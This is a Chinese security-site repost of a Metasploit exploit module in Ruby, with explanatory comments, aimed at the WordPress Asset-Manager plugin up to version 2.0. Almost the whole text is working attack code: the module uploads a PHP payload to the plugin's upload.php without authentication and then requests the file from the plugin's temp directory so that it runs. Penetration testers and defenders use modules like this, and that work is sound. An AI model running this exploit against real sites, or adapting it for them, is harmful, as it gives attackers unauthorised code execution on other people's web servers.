
WordPress Asset-Manager PHP文件上传漏洞

发表于 2012-12-31 09:22:33
这个 Metasploit 模块利用的是 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞：该插件允许未经身份验证的用户将 PHP 文件上传到一个临时目录，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
# Framework core, plus the PhpEXE mixin included by the module class below
# (presumably the source of get_write_exec_payload used in #exploit — confirm
# against the mixin).
require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit exploit module for the unauthenticated file upload in the
# Asset-Manager WordPress plugin (<= 2.0 per the module description).
#
# Flow (see #exploit): one multipart POST to the plugin's upload.php, then a
# GET of the uploaded file under wp-content/uploads/assets/temp/. Those two
# request paths, plus a freshly written *.php in that temp directory, are the
# footprint a defender would look for in web-server logs and on disk.
#
# The class name `Metasploit3` and the `register_options(..., self.class)`
# form follow the 2012-era Metasploit module API.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE # presumably supplies get_write_exec_payload — confirm against the mixin

  # Registers the module metadata and the single module-specific option,
  # TARGETURI (the WordPress base path, default '/wordpress'). Host and port
  # options are inherited from the HttpClient mixin.
  #
  # @param info [Hash] metadata passed through from the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a PHP payload through the plugin's upload.php and then requests
  # the uploaded file so the web server executes it.
  #
  # Aborts via fail_with(Exploit::Failure::UnexpectedReply) when the upload
  # response is missing, not HTTP 200, or does not echo the payload filename,
  # and when the follow-up GET returns a non-200 response.
  def exploit
    # Normalise the base path to end in '/' so the relative paths below
    # concatenate cleanly; uri[-1,1] is the last character.
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}" # label used in status and failure messages
    payload_name = "#{rand_text_alpha(5)}.php" # random 5-letter basename, .php extension
    # :unlink_self presumably makes the generated PHP remove itself after it
    # runs — TODO confirm in the PhpEXE mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body with one file part; 'Filedata' is the form field name the
    # plugin's upload handler is expected to read (per this module's author).
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drop the CRLF that precedes the first boundary marker; presumably the
    # upload handler mis-parses the body otherwise — NOTE(review): confirm.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # Upload counts as successful only if the server answers 200 and the body
    # mentions the uploaded filename.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Request the file from the plugin's temp upload directory to trigger it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    # A nil response is tolerated here (only a present, non-200 reply is
    # treated as failure) — presumably because a running payload may never
    # return a normal HTTP response; confirm.
    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end